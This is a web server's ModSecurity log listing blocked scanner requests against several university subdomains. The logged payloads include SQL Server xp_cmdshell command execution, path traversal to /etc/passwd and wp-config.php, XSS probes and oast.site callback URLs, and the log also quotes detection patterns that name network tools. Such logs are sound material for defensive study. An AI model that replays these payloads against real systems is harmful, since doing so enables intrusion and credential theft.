[Tue Aug 29 11:45:36.463842 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4DagAAAA2"]
[Tue Aug 29 11:45:36.516097 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4DakAAAA2"]
[Tue Aug 29 11:45:36.555342 2023] [:error] [pid 2168] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAh4DasAAAA2"]
[Tue Aug 29 11:45:36.638375 2023] [:error] [pid 2203] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138MCo-f0AAAib5sQAAAAA"]
[Tue Aug 29 11:45:37.459049 2023] [:error] [pid 1836] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within XML:  exec master.dbo.xp_cmdshell/bin/bash -c cat/etc/passwd "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138cCo-f0AAAcsLYkAAAAE"]
[Tue Aug 29 11:45:38.534117 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?:(?:n(?:map|et|c)|w(?:guest|sh)|telnet|rcmd|ftp)\\\\.exe\\\\b|cmd(?:(?:32)?\\\\.exe\\\\b|\\\\b\\\\W*?\\\\/c))" at XML. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "213"] [id "950002"] [rev "3"] [msg "System Command Access"] [data "Matched Data: cmd/c found within XML:  exec master.dbo.xp_cmdshell cmd/c ipconfig "] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "www.unla.ac.id"] [uri "/ioffice/prg/set/wss/ioAssistance.asmx"] [unique_id "ZO138sCo-f0AAAhT3zcAAAAD"]
[Tue Aug 29 11:45:43.639371 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gawc1bns34qinb.oast.site found within TX:1: cjmnbitjmimt14dgn26gawc1bns34qinb.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAfiYxoAAAAg"]
[Tue Aug 29 11:45:43.667395 2023] [:error] [pid 2018] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g8fgqg7dnoci7s.oast.site found within TX:1: cjmnbitjmimt14dgn26g8fgqg7dnoci7s.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "informatika.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAfiYxsAAAAg"]
[Tue Aug 29 11:45:43.957741 2023] [:error] [pid 2131] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g79yohi7h4tuhr.oast.site found within TX:1: cjmnbitjmimt14dgn26g79yohi7h4tuhr.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "journal.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAhT30sAAAAD"]
[Tue Aug 29 11:45:43.967123 2023] [:error] [pid 2217] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gt1h5a57a58g51.oast.site found within TX:1: cjmnbitjmimt14dgn26gt1h5a57a58g51.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "pusatbahasa.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAipS18AAAAF"]
[Tue Aug 29 11:45:43.970986 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26gh1bpq8r3etdgo.oast.site found within TX:1: cjmnbitjmimt14dgn26gh1bpq8r3etdgo.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "ft.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO1398Co-f0AAAg-pQ0AAAAR"]
[Tue Aug 29 11:45:44.771023 2023] [:error] [pid 2163] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26ghrxaytdiat3r1.oast.site found within TX:1: cjmnbitjmimt14dgn26ghrxaytdiat3r1.oast.site"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "www.unla.ac.id"] [uri "/v1/avatars/favicon"] [unique_id "ZO13@MCo-f0AAAhzvdEAAAAx"]
[Tue Aug 29 11:45:47.457697 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAiv-x8AAAAJ"]
[Tue Aug 29 11:45:47.460232 2023] [:error] [pid 2002] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAfSWmYAAAAB"]
[Tue Aug 29 11:45:47.466314 2023] [:error] [pid 2158] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAhui1QAAAAr"]
[Tue Aug 29 11:45:47.479545 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAiv-yAAAAAJ"]
[Tue Aug 29 11:45:47.572638 2023] [:error] [pid 2223] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13@8Co-f0AAAiv-yMAAAAJ"]
[Tue Aug 29 11:45:48.440561 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../../../../../../ found within ARGS:file: /../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "www.unla.ac.id"] [uri "/wp-content/plugins/wordfence/lib/wordfenceClass.php"] [unique_id "ZO13-MCo-f0AAAdxUmwAAAAC"]
[Tue Aug 29 11:45:48.549475 2023] [:error] [pid 2229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi1yTQAAAAM"]
[Tue Aug 29 11:45:48.558668 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAhlz7cAAAAi"]
[Tue Aug 29 11:45:48.590202 2023] [:error] [pid 2229] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi1yTYAAAAM"]
[Tue Aug 29 11:45:48.604104 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAhlz7kAAAAi"]
[Tue Aug 29 11:45:48.639686 2023] [:error] [pid 2111] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAg-pRsAAAAR"]
[Tue Aug 29 11:45:48.970498 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fileName. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:fileName: ../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/wp-content/plugins/candidate-application-form/downloadpdffile.php"] [unique_id "ZO13-MCo-f0AAAi2x@UAAAAN"]
[Tue Aug 29 11:45:48.976020 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi5uAgAAAAS"]
[Tue Aug 29 11:45:48.992694 2023] [:error] [pid 2149] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAhlz8IAAAAi"]
[Tue Aug 29 11:45:48.996973 2023] [:error] [pid 2233] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-MCo-f0AAAi5uAkAAAAS"]
[Tue Aug 29 11:45:49.010354 2023] [:error] [pid 2230] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:obj_name. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:obj_name: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/Visitor/bin/WebStrings.srf"] [unique_id "ZO13-cCo-f0AAAi2x@cAAAAN"]
[Tue Aug 29 11:45:49.364588 2023] [:error] [pid 2231] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAi3ZzUAAAAP"]
[Tue Aug 29 11:45:49.366853 2023] [:error] [pid 1905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAdxUnAAAAAC"]
[Tue Aug 29 11:45:49.368165 2023] [:error] [pid 2232] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAAi4NDcAAAAQ"]
[Tue Aug 29 11:45:49.382732 2023] [:error] [pid 1129] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:eeFile. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:eeFile: ../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/wp-content/plugins/simple-file-list/includes/ee-downloader.php"] [unique_id "ZO13-cCo-f0AAARphOYAAAAU"]
